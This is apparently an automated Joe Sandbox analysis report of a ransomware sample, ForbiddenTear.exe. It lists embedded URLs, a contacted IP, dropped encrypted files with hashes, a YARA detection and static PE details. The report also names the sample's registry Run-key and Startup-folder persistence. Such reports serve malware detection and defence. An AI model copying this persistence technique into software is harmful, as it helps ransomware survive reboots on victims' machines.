                                                            http://www.websitetest.com/ForbiddenTear.exe, ForbiddenTear.exe, 00000000.00000000.207910299.00000000003A5000.00000002.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.carterandcone.comlForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cn.ForbiddenTear.exe, 00000000.00000003.212325334.00000000056D4000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.adrift.org.uk/)ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.founder.com.cn/cnForbiddenTear.exe, 00000000.00000003.212325334.00000000056D4000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/frere-jones.htmlForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp, ForbiddenTear.exe, 00000000.00000003.216316196.00000000056D6000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://www.bitstamp.netForbiddenTear.exe, ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmpfalse
                                                                  		high
                                                                  http://www.jiyu-kobo.co.jp/vForbiddenTear.exe, 00000000.00000003.213905669.00000000056D6000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers/cabarga.htmlForbiddenTear.exe, 00000000.00000003.216224234.0000000005716000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://a9.com/-/spec/opensearchrss/1.0/:itemsPerPageForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.jiyu-kobo.co.jp/pForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.jiyu-kobo.co.jp/mForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/wsdl/ForbiddenTear.exe, 00000000.00000002.246269907.0000000002711000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.jiyu-kobo.co.jp/ForbiddenTear.exe, 00000000.00000003.213436321.00000000056D6000.00000004.00000001.sdmp, ForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.jiyu-kobo.co.jp/lForbiddenTear.exe, 00000000.00000003.213436321.00000000056D6000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.lua.org/ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.macromedia.com/software/flash/open/ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://hdf.ncsa.uiuc.edu/ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.fontbureau.com/designers8ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                                                                                		high
                                                                                https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		low
                                                                                http://www.symauth.com/rpa04ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://wzl.pagekite.meForbiddenTear.exe, 00000000.00000002.246269907.0000000002711000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown

                                                                                  Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  95.216.167.199
                                                                                  		unknownGermany
                                                                                  		24940HETZNER-ASDEfalse

                                                                                  General Information

                                                                                  Joe Sandbox Version:31.0.0 Red Diamond
                                                                                  Analysis ID:325968
                                                                                  Start date:02.12.2020
                                                                                  Start time:16:26:24
                                                                                  Joe Sandbox Product:CloudBasic
                                                                                  Overall analysis duration:0h 7m 34s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:light
                                                                                  Sample file name:ForbiddenTear.exe
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                  Number of analysed new started processes analysed:19
                                                                                  Number of new started drivers analysed:1
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • HDC enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Detection:MAL
                                                                                  Classification:mal100.rans.adwa.winEXE@12/5@1/1
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HDC Information:Failed
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 99%
                                                                                  • Number of executed functions: 0
                                                                                  • Number of non-executed functions: 0
                                                                                  Cookbook Comments:
                                                                                  • Adjust boot time
                                                                                  • Enable AMSI
                                                                                  • Found application associated with file extension: .exe
                                                                                  Warnings:
                                                                                  Show All
                                                                                  • Exclude process from analysis (whitelisted): smss.exe, csrss.exe, winlogon.exe, svchost.exe, UsoClient.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 168.61.161.212, 67.26.83.254, 67.26.81.254, 67.27.234.126, 8.253.204.120, 67.27.235.254
                                                                                  • Excluded domains from analysis (whitelisted): blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  16:27:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Service "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc.exe"
                                                                                  16:27:47AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Service "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc.exe"
                                                                                  16:28:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  No context

                                                                                  Domains

                                                                                  No context

                                                                                  ASN

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  HETZNER-ASDEHlxj8nfBay.exeGet hashmaliciousBrowse
                                                                                  • 88.99.66.31
                                                                                  N6Fv7clWxO.exeGet hashmaliciousBrowse
                                                                                  • 168.119.38.182
                                                                                  7z6cDuH7Md.exeGet hashmaliciousBrowse
                                                                                  • 88.99.66.31
                                                                                  cpMHTTwNC1.exeGet hashmaliciousBrowse
                                                                                  • 88.99.66.31
                                                                                  PO8433L.exeGet hashmaliciousBrowse
                                                                                  • 88.198.22.168
                                                                                  PayeeAdvice_HK02022_R0977491_02178_PDF.exeGet hashmaliciousBrowse
                                                                                  • 49.12.47.176
                                                                                  IaGdBpfkmV.exeGet hashmaliciousBrowse
                                                                                  • 88.99.66.31
                                                                                  AddressValidateForm-112430163-12012020.xlsGet hashmaliciousBrowse
                                                                                  • 136.243.219.85
                                                                                  AddressValidateForm-112430163-12012020.xlsGet hashmaliciousBrowse
                                                                                  • 136.243.219.85
                                                                                  http://www.8689christine.johnson.ketabebourse.com/?VGH=Y2hyaXN0aW5lLmpvaG5zb25Ab2Nzc2VydmljZXMuY29t&data=04|01|christine.johnson@ocsservices.com|ddf4e3b17f6248d1dc6908d895b7e874|a376937a74b041c598e16157ec71fafc|0|0|637423964394781731|Unknown|TWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=|1000&sdata=KfvutEfVt7ksS/9DwJPl3bv+x3vhTR1TFV12wMF4G+M=&reserved=0Get hashmaliciousBrowse
                                                                                  • 138.201.54.59
                                                                                  A5RsEkXArf.exeGet hashmaliciousBrowse
                                                                                  • 88.99.66.31
                                                                                  invoice8049.xlsGet hashmaliciousBrowse
                                                                                  • 88.198.58.29
                                                                                  invoice8049.xlsGet hashmaliciousBrowse
                                                                                  • 88.198.58.29
                                                                                  SecuriteInfo.com.Heur.13015.xlsGet hashmaliciousBrowse
                                                                                  • 88.198.58.29
                                                                                  SecuriteInfo.com.Heur.13015.xlsGet hashmaliciousBrowse
                                                                                  • 88.198.58.29
                                                                                  SecuriteInfo.com.Heur.22446.xlsGet hashmaliciousBrowse
                                                                                  • 88.198.58.29
                                                                                  SecuriteInfo.com.Heur.22446.xlsGet hashmaliciousBrowse
                                                                                  • 88.198.58.29
                                                                                  http://mail.strantake.casaGet hashmaliciousBrowse
                                                                                  • 46.4.123.222
                                                                                  invoice.xlsGet hashmaliciousBrowse
                                                                                  • 88.198.58.29
                                                                                  invoice.xlsGet hashmaliciousBrowse
                                                                                  • 88.198.58.29

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\ProgramData\Adobe\ARM\S\436\AdobeARM.msi
                                                                                  Process:C:\Users\user\Desktop\ForbiddenTear.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):992288
                                                                                  Entropy (8bit):7.999838255099252
                                                                                  Encrypted:true
                                                                                  SSDEEP:24576:yCXQBtyRC4uybH+WdSY9yNNOJRJ45/LzCxXhPd5MQI+Eh/gVua:NXY4RRqGSY9ojLmxXVE/Na
                                                                                  MD5:DCF19D19676D479781CC00CF2C16DD8E
                                                                                  SHA1:84C807221C401E66DB0E15E65EA1AA04629FE263
                                                                                  SHA-256:FFD84F6D2CB078E2822858396E22B93725184F79B1E50E0328BFF733F58822DE
                                                                                  SHA-512:5DDF4A92DF6B274C639560F460882AD997800E056252C0D9F4BE6FA197F1A46E9AB507BEC963CBF012DC03FD5E343A20041707C3791154A845B3FC352894682C
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: 6.:...u...{+1~..y.E....K.).....|..|l)&.S....Y.....Kr.M.(<.....Y...o..>]...J.v..,........%.d .....~mq....f...3.qlB..X...q......n..T..>.*.@6.0%je..&....\VZP.1....#@\."..0...........Y...Q.....Gd9.d.....I.|.;..8../X9...~.B.)..T.h.(e....rY..U..h.f..b.L|.......w.byP|.(...]..+T.d.f.5T..3.u..U.b..%(.;.;(..V1.ws.Z2.%LU..?.X./...F....A.-...d..2...j.A......;..Xj.*.....l./K.`...L>Zz.A?w.Q..afI...@4..h.j......J..bpj......?...%........c..U..Dv..Gf.#.....o..5.o...e-...''..2..8).z..GI......>=.........^W..H.[...4A.....U.1...X...vdA.K..$..<c..E).9...Z..zo..R....j.N.DzU8[T..u._..ie\E....oS...E.[G....:..~......f.[.^.u....s...'....?!.ns....C..R....4D.bA.).?Z.Z~..%...2....dVw.xD'y...4...M......w..5Z.E...N7.(c...#L..5.$*...[}(.....C.Q..U..r...#..8.K..j.3R...I...-.q(_tV(,k`...?..o...d%{..yM..i....nU.mM.{...$J.~.:4....u...*.......>`i...6.3gT..Y.:MBh..H..?.r.......iPdd;..1.........n......<?W........\.....H...*.[mL...baiY5...?..?....._`4.v........;.N...._+.....0.Qd
                                                                                  C:\ProgramData\Adobe\ARM\S\ARM.msi
                                                                                  Process:C:\Users\user\Desktop\ForbiddenTear.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):992288
                                                                                  Entropy (8bit):7.999815444203463
                                                                                  Encrypted:true
                                                                                  SSDEEP:24576:ObJouCDYxpu0e0ma7qxTWXsFuJsIHVLThotPJS9U4QQAMDx:ObJPCEx40e0maWxuJsqVHh+hpQn
                                                                                  MD5:5F3DE833CE77C5186D35ACD020F89181
                                                                                  SHA1:574FBE58D96D27E5CCEBC7EFBB7B4C0D7C8A5AAF
                                                                                  SHA-256:94899F017F734A454B2B2FEC33745146F212BAFAE193341BC6B85BE7A907620E
                                                                                  SHA-512:6413971375064D92716756AB6262F9585A475B05C28D02B6521C9CC0CF53FF6F38D4FC0ACBCCC643E6B9572F3C07F6138DE674FF26FA9D10BAA6592BD2D1D503
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: ...~.7.gL.....c...M..LFv....R..a.d^.PJIA9z.....A......d}/S..........6....M.9.....m/......V...w.i&.....]6..w.o.........W&..."%.O..$.m6..g.$c.'"f0E......V........J....j...g.kQ..w..{..s?....sF.6a.....,V...^R...y.....Z......b.E.Yu.+*.xznN..-.`.8.L.....[.........".....kAwK..y.VX^h.YN.'@-(..$..f.QQ.y....H.......ca..]~..e...eK.._...M.=...{J..~L-W1..v.B...SuB.dk...>w./6....kP~....N.....A.U^..ng..U~l.hv$TO.>.X..bx.....7..J.u..=5.o<......7'<.`W.x....Yr.\Ab'...2...y.\.E.P...$...=g..q...~ae..O..0.5D{5p....5sEyrO....[.;..4T+....]....~.%.[.Be.o......#U.kf..w......:.H......F.)+*...L......@.Yr3Nf.....wh.......|...Z.. ..h.'..y...~Z[...g=..2_.../..X..:p...XU..q.....}....W.T.......X...l2...;.3...E.......Y.~_.h...K..3.._.T'm.a........../..~.}...^.o...........%./.z....Vo......m...R........+.M.rj.f....<(Z.jPUu........h...rI&.....=.;....q.?........d.'l...5.64.Lu|.....vWEB...F..,v~.9-......=o..P.Fo..?AB.4..z..\..Sg.v.. '........k..[BF.F...1B...0W.....
                                                                                  C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\RdrManifest3.msi
                                                                                  Process:C:\Users\user\Desktop\ForbiddenTear.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):15904
                                                                                  Entropy (8bit):7.989292525747435
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:9KY6UsdhzcXQsF6nwKtpukDn3WvsVav4BBP4+XpJPvj8sv/Z:4isdoi3DVNzg+LvvJ
                                                                                  MD5:889764FF709A2EBE9F557AB27714418D
                                                                                  SHA1:B3DBD4CDB523682E4DD81BFE9D165BAE996711F1
                                                                                  SHA-256:79C024B8D57374772E98681A28F8CA91DD17A889EF7E092919E2ACC059217A74
                                                                                  SHA-512:C64048E24477D13FACF648DF9C50A44428D1F6267F577E5722BF87A154F8B17667EDAE09BCCF3C51BC231092121994869EE33244F2A00AF78F943927122AD428
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: ..x..>("..h..v}..`f.B.n\=........m\n....x.n.N$C..,Z.|.....9~.x...b....".:2K.?133g..E..P:-..........qlD.3.._.=.X!. .G@..!.k....?P...-.<......{.:.1.$..j.{..]PO~..O....h<Y.0..I.D..J.....H.u....n^..4...q!.[F.!......Z...]..6..R.2.....AJ...U..C....f....jv."n}..1K.B..........s.07..jA..5..R.zp.9..23..;]._....K...3.\r~.....U.............Q..H.Pd{.....m:.6......h..'..c.Ih.e..-... .Oqfo.Xp.^..g..k...8...X...@....a...-RA..+..}...9...0.@...7.U]......\%p.......)(K..?..L...Y:h..;.?.^..........]....."...L..V....~..;g..8M(..z...Z.fD..>.h......-.b<..#.N....$u..pr.k..L.\.0...os.$.....Zw....n).)i2d..!.....<.'.1X.h.8>...2....D..V'k.C".....%n.j.....8...$.*....3..\s...8.#..ZF..D..|..|.r(n.....Mp.|.,....b.X.Dzl.&n}J7.....s.3..e7.q9G..utr/.9..8........spc.`;Sn.:.....lm..]..E-.{.$..".k/.=....$.......<......)R)..V.H*....L..r...,.T ~..0q...P)...Jq.V./.sf*...hgB.:._?.lj...$....._..l...........X.g..".|..K3.,..W...a...F...#.j!kf.%....y.z...Z.......`..
                                                                                  C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi
                                                                                  Process:C:\Users\user\Desktop\ForbiddenTear.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):2794016
                                                                                  Entropy (8bit):7.999929892590803
                                                                                  Encrypted:true
                                                                                  SSDEEP:49152:N2ChBPyPNWANgiVWTqWghKeQVOsfWNRERJNbub4h1pUv5YdW:NhhBP83zx1hKIEmERHbZhHcYdW
                                                                                  MD5:8E05F28682FB7D79B652F3C376E03659
                                                                                  SHA1:56AF9D25398F887165E2F184D6D5B51DAE980332
                                                                                  SHA-256:7C5700BFD4E91CBCD1102EB7A6361FF76139509892406C4A79A4599F8F59C712
                                                                                  SHA-512:3A4EB50387E58350149791335CB7B9219F2082151CC87F9F90783F628BE7021284F532B69D166CFDB3A81B91C2F833E9FDFB8A7BF802871A8A1A1683F940D18D
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: .<V..%..B......=...<...,...W...b..>&....>......._.X.....f...u.46.&...7..>UY....o..,.z."...j...zW...=.>.9+4.=...P.TO.G..F...N-*.n.MXQQ...kLm....g..!.#tbV..g...E.F....c..@.w.HUoN0.......'4.<..=..}.l....\...u~i....83&..k.K.......[.H.'...Q.... ...L.x...L...>....I...U.<...`....z...q.Z.n.......E.....v'.mni..m..U.....'.G....wf....v.P....5....|. ...)c...L.I.4S6...:L.@..P.d_.f..@=...D...4'..}......[..U.2....8...k..u..ua"Y`.u/3F..Lj .....X..}HV@.p7*-Fg..5f..M...gp....x...7O...........".#|1s...o...5....ee...&...eG6sOj....{....<....Fw.Mk.=Y.....Q.Z..=T....tu.;3.Y.'.p.z..E.}D........S..2dj..9....gN"D".'.Z...8`...i..P....l....b.T.5p.J..PYOcx.h\..\.E........T3v.DB.<.......a..).W7.......gH.6...g<..A.M.".js..aAs...%...q(.b..%..A.i...y.8@K%..,.&.j/._..a5..mp...=6A!bg*....z.@A|.....CA.3Z..{.i.9I8.n....x... ..._.P97...LY.s.t7..s.n@...kR.............'.+.%.#U.cI.R...)9{#...Q..[./.....*:.a...u]..O.....T/g.^G.7J;L...3.+....h......(Ve...t.n.c='.Y>.
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc
                                                                                  Process:C:\Users\user\Desktop\ForbiddenTear.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):569344
                                                                                  Entropy (8bit):3.0842833726389145
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:HOb20BkUl2EBm320B/bN2EBcZbKi+lDAA:HOqeKdAA
                                                                                  MD5:8AD3B3C4396AF8F9661168F4D3FDA7A4
                                                                                  SHA1:3FFA8A86CB8B7F65F319DAB071A1AD3FFB5FE7DC
                                                                                  SHA-256:75574B8553F0C59E2D26CAFD3CF92FE38EB815D6F11A3473CDB39741BBDA72FD
                                                                                  SHA-512:0D9B1F1C15B4CA3AD274EC6B810DDB5DB5A0B0F6D38A9BB92FE153242C6E3AEE5EBC66D51BDD02CE2AEFF1F47D1BEA3FB5534F3940AEC3A23EBB43A19A5D28FB
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: MAL_RANSOM_COVID19_Apr20_1, Description: Detects ransomware distributed in COVID-19 theme, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc, Author: Florian Roth
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                  Reputation:low
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................"..........NA... ...`....@.. ....................... ............@..................................A..K....`.............................................................................. ............... ..H............text...T!... ...".................. ..`.rsrc.......`.......$..............@..@.reloc..............................@..B................0A......H............@......!....;..\............................................~....9.....*(....9...........*.*....0..........~....(....9....*......%.(.....%.r...p.%.(.....%.r...p.%...(.....~.....(.....(....:....*s.......o....8....(.....o.....@..........9.....o.....*.........]."........0...................(.....o.....*...0..........~.....s......r...po........_...&s.....s.........o......r;..po......rK..po.......o.....o....&.o...........&........9.....o......*.(.... .Ii.............R

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):3.0842833726389145
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  File name:ForbiddenTear.exe
                                                                                  File size:569344
                                                                                  MD5:8ad3b3c4396af8f9661168f4d3fda7a4
                                                                                  SHA1:3ffa8a86cb8b7f65f319dab071a1ad3ffb5fe7dc
                                                                                  SHA256:75574b8553f0c59e2d26cafd3cf92fe38eb815d6f11a3473cdb39741bbda72fd
                                                                                  SHA512:0d9b1f1c15b4ca3ad274ec6b810ddb5db5a0b0f6d38a9bb92fe153242c6e3aee5ebc66d51bdd02ce2aeff1f47d1bea3fb5534f3940aec3a23ebb43a19a5d28fb
                                                                                  SSDEEP:6144:HOb20BkUl2EBm320B/bN2EBcZbKi+lDAA:HOqeKdAA
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................"..........NA... ...`....@.. ....................... ............@................................

                                                                                  File Icon

                                                                                  Icon Hash:6eecccccd6d2f2f2

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x47414e
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x741000x4b.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x760000x189f4.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x900000xc.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x20000x721540x72200False0.120725800931data2.53471849294IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0x760000x189f40x18a00False0.144977395305data4.2788498639IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x900000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountry
                                                                                  RT_ICON0x761a80x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                                                  RT_ICON0x787500x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
